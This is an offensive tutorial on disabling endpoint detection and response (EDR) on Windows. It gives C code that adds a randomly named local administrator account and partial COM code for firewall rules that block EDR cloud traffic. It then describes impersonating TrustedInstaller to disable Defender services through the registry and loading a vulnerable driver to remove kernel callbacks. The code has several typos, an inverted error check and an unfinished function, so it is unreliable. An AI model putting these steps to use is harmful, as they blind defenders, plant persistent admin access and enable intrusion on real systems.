EDR Killing

First, we need to create a local administrative account to enforce the local policy. The firewall may not be enabled locally, due to managed policy. To create a local administrative account to enforce the local policy instead of the domain with a C program:

int main(){
	srand (GetCurrentProcessId()); 
	WCHAR *username= NULL;
	WCHAR *password = NULL;
	USER_INFO_1 ui;
	DWORD dwError = 0;
	GenString(&username, 12, 26);
	GenString(&password, 12, 71);
	printf("Username is: %s\n", username);
	printf("Password is: %s\n", password);
	
	ui.usri1_name = username;
	ui.usri1_password password;
	ui.usri1_priv = USER_PRIV_USER;
	ul.usri1_flags - UF_DONT_EXPIRE_PASSWD;
	ui.usri1_home_dir = NULL;
	ui.usri1_comment = NULL;
	ui.usri1_script_path = NULL;

	NET_API_STATUS status;
	status = NetUserAdd(NULL, 1, (BYTE*)&ui, &dwError);
	if(status != NERR_Success) {
		printf("NetUserAdd failed. Error: %d\n", status);
	}

	LOCALGROUP_MEMBERS_INFO_3 1mi;
	lmi.lgrmi3_domainandname = username;
	status = NetLocalGroupAddMembers (NULL, L"Administrators", 3, (BYTE*)&lmi, 1);
	if(status = NERR_Success) {
		printf("NetLocalGroupAddMembers failed. Error: %d\n", status);
	}
	return 0;
}

Then, block the EDR network range, since most EDRs are cloud based, the network range can be identified monitoring network traffic using Network Monitor (Signed by Microsoft: https://www.microsoft.com/en-ca/download/details.aspx?id=4865):

// gcc firewall.c -o firewall.exe -lole32 -loleaut32 -luuid.
#include <windows.h>
#include <stdio.h>
#include <netfw.h>

int main() {
	HRESULT hr;
	GUID GUID_HNetCfg_FwPolicy2 = {0xe2b3c97f, 0x6ae1,0x41ac,{0x81,0x7a,0xf6,0xf9,0x21,0x66,0xd7,0xdd}};
	IClassFactory *icf = NULL;
	IDispatch *id = NULL;
	INetFwPolicy2 *nfp2 = NULL;

	hr = CoInitialize(NULL);
	hr =CoGetClassObject(&GUID_HNetCfg_FwPolicy2, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER, NULL, &IID_IClassFactory, (VOID **)&icf);

	if(hr != S_OK) {
		printf("CoGetClassObject failed: HRESULT 0x%08x\n", hr);
		CoUninitialize();
		ExitProcess(0);
	}
	
	hr = icf->1pVtbl->CreateInstance(icf, NULL, &IID_IDispatch, (VOID**)&id);
}

After that, disable the service: https://github.com/Mr-Un1k0d3r/EDRs/blob/main/elevate_to_system_or_trustedinstaller.c

You can impersonate the TrustedInstaller privilege, but duplicating the service token and get the group.

With the TrustedInstaller privilege you can tamper the registry key associated with the services.

Remove the ImagePath and set Start to 0x4 for the following services:

▪ Sense

▪ WdBoot

▪ WinDefend

▪ WdNisDrv

▪ WdNisSvc

Reboot and the EDR should not be working.

Some EDR prevent tampering from the kernel, so you can bring your own vulnerable driver to compromise the kernel and remove the kernel callback: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

Drivers tend to be poorly designed and there are vulnerabilities all over the place.